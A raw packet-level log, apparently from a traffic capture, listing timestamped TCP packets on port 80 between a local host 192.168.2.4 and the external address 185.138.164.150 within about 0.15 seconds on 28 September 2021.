Sep 28, 2021 07:14:09.036334038 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036335945 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.036370993 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036391973 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036392927 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.036417007 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036438942 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036439896 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.036459923 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036480904 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036501884 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036503077 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.036523104 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036542892 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036544085 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.036565065 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036572933 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.036588907 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036609888 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.036611080 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036633968 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036653996 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036674023 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.036674976 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036695957 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036716938 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036717892 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.036737919 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036737919 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.036761999 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036776066 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.036784887 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036806107 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036825895 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036827087 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.036848068 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036869049 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036869049 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.036890030 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036911011 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036933899 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036943913 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.036956072 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036958933 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.036978960 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036999941 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.037043095 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.037152052 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.037219048 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.037240028 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.037292004 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.039207935 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.045834064 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.045865059 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.045891047 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.045912981 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.045924902 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.045933962 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.045954943 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.045974970 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.046017885 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.070344925 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.070385933 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.070415020 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.070437908 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.071424007 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.072284937 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.072325945 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.072356939 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.072406054 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.072422981 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.072438002 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.072459936 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.072515011 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.072554111 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.072559118 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.072587013 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.072618961 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.072626114 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.072674036 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.072695971 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.072717905 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.072741032 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.072755098 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.072798967 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.072829008 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.072859049 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.072877884 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.072902918 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.072912931 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.072945118 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.072966099 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.072968960 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.072999954 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.073019981 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.073021889 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.073055029 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.073072910 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.073106050 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.073131084 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.073148012 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.073157072 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.073198080 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.073219061 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.073223114 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.073271990 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.073273897 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.073338985 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.073365927 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.073390961 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.073412895 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.073414087 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.073441029 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.073452950 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.073487043 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.073518038 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.073559999 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.073595047 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.073606968 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.073637009 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.073703051 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.073750973 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.073765039 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.073806047 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.073826075 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.073849916 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.073870897 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.073885918 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.073893070 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.073893070 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.073909998 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.073915005 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.073940992 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.073957920 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.073965073 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.073987007 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.074007988 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.074014902 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.074033976 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.074042082 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.074069023 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.074090958 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.074112892 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.074121952 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.074143887 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.074151993 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.074167013 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.074187040 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.074209929 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.074223042 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.074232101 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.074249983 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.074254036 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.074278116 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.074301004 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.074307919 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.074322939 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.074342966 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.074346066 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.074368954 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.074387074 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.074393034 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.074414968 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.074438095 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.074455023 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.074521065 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.074686050 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.077395916 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.082726002 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.082762003 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.082782984 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.082807064 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.083093882 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.083148956 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.083173037 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.083559990 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.109450102 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.109484911 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.109500885 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.109519958 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.109591961 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.109644890 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.114269972 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.114341021 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.114353895 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.114366055 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.114396095 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.114408016 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.114418983 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.114429951 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.114442110 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.114511013 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.114559889 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.114564896 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.114609957 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.114613056 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.114617109 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.114626884 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.114696980 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.114722013 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.114743948 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.114774942 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.114795923 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.114828110 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.114840031 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.114847898 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.114847898 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.114885092 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.114886999 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.114907026 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.114942074 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.114942074 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.114979982 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.114984035 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.115016937 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.115020037 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.115041971 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.115056992 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.115067005 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.115087986 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.115094900 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.115109921 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.115150928 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.115164042 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.115174055 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.115196943 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.115205050 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.115216970 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.115226984 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.115240097 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.115261078 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.115263939 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.115284920 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.115292072 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.115305901 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.115325928 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.115329027 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.115346909 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.115366936 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.115386009 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.115389109 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.115411043 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.115413904 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.115432024 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.115441084 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.115458012 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.115479946 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.115479946 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.115499973 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.115524054 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.115525961 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.115547895 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.115580082 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.115626097 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.121860981 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.121906996 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.121931076 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.121941090 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.121954918 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.121970892 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.121984959 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.122006893 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.122016907 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.122031927 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.122052908 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.122056007 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.122091055 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.145055056 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.145092964 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.145117044 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.145137072 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.145149946 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.145181894 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.151721001 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.151753902 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.151799917 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.151822090 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.151843071 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.151865005 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.151869059 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.151887894 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.151932001 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.151938915 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.151947021 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.151962996 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.152008057 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.152013063 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.152059078 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.152097940 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.152102947 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.152137995 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.152148962 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.152160883 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.152183056 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.152184010 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.152205944 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.152206898 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.152232885 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.152260065 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.157954931 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.157993078 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.158018112 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.158041000 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.158061981 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.158082008 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.158107996 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.158142090 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.158184052 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.158205986 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.180562019 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.181428909 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.181509972 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.181548119 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.181571007 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.181623936 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.181724072 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.188064098 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.188096046 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.188117981 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.188143969 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.188222885 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.188266039 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.188272953 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.188282967 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.188349009 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.188374996 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.188397884 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.188425064 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.188438892 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.188448906 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.188518047 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.188533068 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.188565969 CEST	80	49751	185.138.164.150	192.168.2.4
